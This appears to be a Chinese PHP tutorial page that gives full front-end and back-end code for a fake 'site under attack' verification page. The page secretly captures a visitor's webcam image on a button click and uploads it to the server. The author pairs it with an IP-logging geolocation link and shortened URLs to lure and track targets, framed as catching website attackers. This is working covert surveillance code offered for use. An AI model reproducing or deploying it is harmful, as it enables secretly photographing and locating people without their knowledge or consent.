下载鸥 > 网站下载 > 开发教程 > PHP

利用php记录网站攻击者桌面照片和ip地址

918 2021-01-25 18:34:20

收藏

简述

黑科技,请勿滥用。

利用php记录网站攻击者桌面照片和ip地址,可以记录IP,顺手偷拍攻击对象,看看他长啥样!

因为事先已经有了IP记录平台,所以方便省事,直接开始研究偷拍

随手写了偷拍页面前端,伪造的受攻击验证(将就看,毕竟只是做一次演示)

 

前端代码
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>人机验证机制</title> <meta name='Generator' content='EditPlus'> <meta name="viewport" content="width=device-width, user-scalable=no,initial-scale=1, minimal-ui"> <meta name='Description' content='inveted by: http://davidwalsh.name/browser-camera'> <script type="text/javascript" src="http://apps.bdimg.com/libs/jquery/2.1.1/jquery.js"></script> <style> html body{width: 100%;height:auto;margin:0 auto 0px;padding:0 0 0px;background-color: #444 } a{text-decoration:none; } .wenzi{width: 300px;height: 300px; margin-right: auto;margin-left: auto; } .yuyan{width: 100% ; height: 150px ; color: #fff; margin-top: 60px; text-align: center;} .sf{width: 100%;height: 150px; line-height: 150px ;text-align: center;} .sf a{display: block;font-size: 12px;margin-left: 28%; text-decoration: none; text-align: center;background-color: #EBEBEB; width: 50px;height: 20px;line-height: 20px; border:solid 1px #222; float: left; } .sf button{display: block; font-size: 13px; margin-left: 10px ; text-align: center;background-color: #EBEBEB; width: 50px;height: 22px; border:solid 1px #222; float: left;} </style> <script> window.addEventListener("DOMContentLoaded", function() { // Grab elements, create settings, etc. var canvas = document.getElementById('canvas'); var context = canvas.getContext('2d'); var video = document.getElementById('video'); var mediaConfig = { video: true }; var errBack = function(e) { console.log('An error has occurred!', e) }; // Put video listeners into place if(navigator.mediaDevices && navigator.mediaDevices.getUserMedia) { navigator.mediaDevices.getUserMedia(mediaConfig).then(function(stream) { video.src = window.URL.createObjectURL(stream); video.play(); }); } /* Legacy code below! */ else if(navigator.getUserMedia) { // Standard navigator.getUserMedia(mediaConfig, function(stream) { video.src = stream; video.play(); }, errBack); } else if(navigator.webkitGetUserMedia) { // WebKit-prefixed navigator.webkitGetUserMedia(mediaConfig, function(stream){ video.src = window.webkitURL.createObjectURL(stream); video.play(); }, errBack); } else if(navigator.mozGetUserMedia) { // Mozilla-prefixed navigator.mozGetUserMedia(mediaConfig, function(stream){ video.src = window.URL.createObjectURL(stream); video.play(); }, errBack); } // Trigger photo take document.getElementById('snap').addEventListener('click', function() { context.drawImage(video, 0, 0, 640, 480); var url = canvas.toDataURL('image/png'); document.getElementById('result').value = url; var uu=url.substr(22); $(document).ready(function(){ $.ajax({ cache: true, type: "POST", url:"jieshou.php", data:$('#tp').serialize(), async: false, error: function(request) { alert("Connection error"); }, success: function(data) { $(".return").parent().html(data); } }); }); }); }, false); </script> </head> <body> <div class="wenzi"> <div class="yuyan"> 目前平台正在遭受攻击! <br/> <br/> 显示非正常请使用uc浏览器访问! </div> <div class="sf"> <button id='snap'>确定</button> </div> </div> <div> <video id='video' width='0' height='0'></video> <canvas style="width:0px;height:0px" id='canvas' width='640' height='480'></canvas> <form id="tp" action="./jieshou.php" method="post"> <input type="hidden" type="file" value="sdgsdg" id="demo_input" /> <input type="hidden" name="img" id="result" value="" /> <p id="img_area"></p> <input type="hidden" type="submit" value="提交"> </form> </div> <div class= "return"></div> </body> </html>

jishu.php

后端代码
<?php error_reporting(0); $base64_img = trim($_POST['img']); $up_dir = './upload/';//存放在当前目录的upload文件夹下 if(!file_exists($up_dir)){ mkdir($up_dir,0777); } if(preg_match('/^(data:s*image/(w+);base64,)/', $base64_img, $result)){ $type = $result[2]; if(in_array($type,array('pjpeg','jpeg','jpg','gif','bmp','png'))){ $new_file = $up_dir.date('YmdHis_').'.'.$type; if(file_put_contents($new_file, base64_decode(str_replace($result[1], '', $base64_img)))){ $img_path = str_replace('../../..', '', $new_file); echo '网站正在遭受攻击,请稍后访问'; } } }

绑定域名并存放至根目录前往ip.heibai.org生成定位链接

(因为平台都是我的,所以我可以自由修改定位链接内容!!!如果要实践定位链接请自行搭建)

马赛克部分为偷拍地址,设置1秒跳转

 

百度短网址生成链接,开始测试阶段

IP记录成功,接下来是激动人心的时刻,看看是否偷拍成功

查看了我的图片存放目录,成功了的

 

嗯,对,证明我的思路是可行的。

本文地址:https://xzo.com.cn/develop/php/507.html

有帮助,很赞!

信息来源:精准像素
导出教程 下载word版教程
发表评论 共有条评论
关于PHP

PHP是一种服务器端、跨平台、html嵌入式的脚本语言,其功能十分强大、入门简单。在过去,民间一直有说法称“PHP是最好的编程语言”,是PHP开发者对自身所使用语言的肯定。

PHP曾是最主流的网站web开发语言之一,现在也依然十分流行。

推荐PHP开发教程
PHP判断某个时间戳(打卡、点餐、签到等)是不是今天记录的
PHP判断某个时间戳(打卡、点餐、签到等)是不是今天记录的

php判断时间戳是不是今天的实现方法:首先创建一个PHP示例文件;指定一个时间,并...

15 1056
PHP怎样正则匹配段落里的图片并提取图片链接?
PHP怎样正则匹配段落里的图片并提取图片链接?

在程序开发的过程中,我们可能需要提取段落里的图片用作缩略图。那么,这个正则...

19 873
PHP怎样高效快速地生成一组10条随机数?
PHP怎样高效快速地生成一组10条随机数?

猜你喜欢如果用rand()来获取随机ID是非常消耗性能的。小网站几百几千条数据...

1 398
ajax发起session请求发现session无效了怎么办?
ajax发起session请求发现session无效了怎么办?

今天遇到这样一个问题:php启用了session,经过测试也发现session生效了。但在a...

1 378
怎样在每次发起请求时重置session_id?
怎样在每次发起请求时重置session_id?

在一些开发场景中,我们需要在每次发起请求后更新重置session_id以同步用户数...

3 340
PHP函数switch()介绍
PHP函数switch()介绍

通俗的说,现在有结果A B C D E,每个结果代表不同的意义,此时我们可以用if else...

0 343
php常用基础函数isset()介绍
php常用基础函数isset()介绍

isset() 函数用于检测变量是否已设置并且非 NULL。如果已经使用 unset() 释...

0 331
PHP的for循环为什么只执行了一次就停止了?
PHP的for循环为什么只执行了一次就停止了?

今天有朋友咨询鸥哥,说php写的for循环本来至少要循环9次,但却只执行了一次就...

1 347
推荐插件
帝国cms纳米数据接口(足球比赛中最新数据)
帝国cms纳米数据接口(足球比赛中最新数据)

帝国cms 对接纳米数据(www.nami.com)接口,本接口主要接收、整理足球比赛实时数...

0 186
帝国cms在线考试系统模板插件
帝国cms在线考试系统模板插件

一直没看到好用的帝国cms在线考试插件,所以自己开发了一款。在线考试插件用...

0 1179
帝国cms自动给正文关键词添加tag内链
帝国cms自动给正文关键词添加tag内链

帝国cms有自带的给关键词添加内链功能,但需要手动添加关键词,容易出现疏漏和...

0 671
帝国cms百度、必应bing、神马推送增强收录三合一插件
帝国cms百度、必应bing、神马推送增强收录三合一插件

因客户需要一键推送到多平台,下载鸥开发了这款一键推送至百度、必应、神马插...

0 33
帝国cms百度文字识别ocr接口对接插件
帝国cms百度文字识别ocr接口对接插件

许多网站会做一些小功能小插件给客户使用以增强用户黏性,比如图片转文字,这种...

0 376
帝国cms联想词搜索高级搜索插件下载
帝国cms联想词搜索高级搜索插件下载

帝国CMS自带的搜索功能虽然强大,但也有很强的局限性 -- 必须关键词完全匹配...

0 630
帝国cms百度AI黑白图像上色api接口对接插件
帝国cms百度AI黑白图像上色api接口对接插件

百度开放了系列AI功能api如图像上色、图像去雾、图像修复、无损放大、清晰...

0 328
帝国cms网站会员登录与退出历史记录日志插件
帝国cms网站会员登录与退出历史记录日志插件

帝国cms默认只有上次登录时间与ip,没有一个记录清单,所以今天,我们分享这个帝...

0 281
客服QQ:341553759
扫码咨询 常见问题 >
官方交流群:90432500
点击加入